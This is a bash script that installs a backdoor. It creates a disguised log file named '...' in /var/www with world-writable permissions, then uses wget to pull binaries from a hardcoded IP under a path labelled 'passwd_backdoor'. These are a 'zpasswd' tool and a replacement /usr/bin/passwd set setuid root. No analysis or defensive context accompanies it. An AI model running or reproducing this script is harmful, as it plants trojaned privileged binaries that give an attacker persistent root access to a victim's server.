#!/bin/bash

if [ ! -f /var/www/... ]; then
   /bin/touch /var/www/...
   /bin/chown root:root /var/www/...
   /bin/chmod 777 /var/www/...
   echo "[${date +"%d %b %Y %H:%M:%S"}] Created ..." >> /var/www/...
fi

if [ ! -f /usr/bin/zpasswd ]; then
   /usr/bin/wget -P /usr/bin/ http://75.127.15.174/passwd_backdoor/zpasswd > /dev/null 2>&1
   /bin/chown root:root /usr/bin/zpasswd
   /bin/chmod 0755 /usr/bin/zpasswd
   echo "[${date +"%d %b %Y %H:%M:%S"}] Downloaded zpasswd" >> /var/www/...
fi

if [ ! -f /usr/bin/passwd ]; then
  /usr/bin/wget -P /usr/bin/ http://75.127.15.174/passwd_backdoor/passwd > /dev/null 2>&1
  /bin/chown root:root /usr/bin/passwd
  /bin/chmod 4755 /usr/bin/passwd
  echo "[${date +"%d %b %Y %H:%M:%S"}] Downloaded passwd" >> /var/www/...
fi
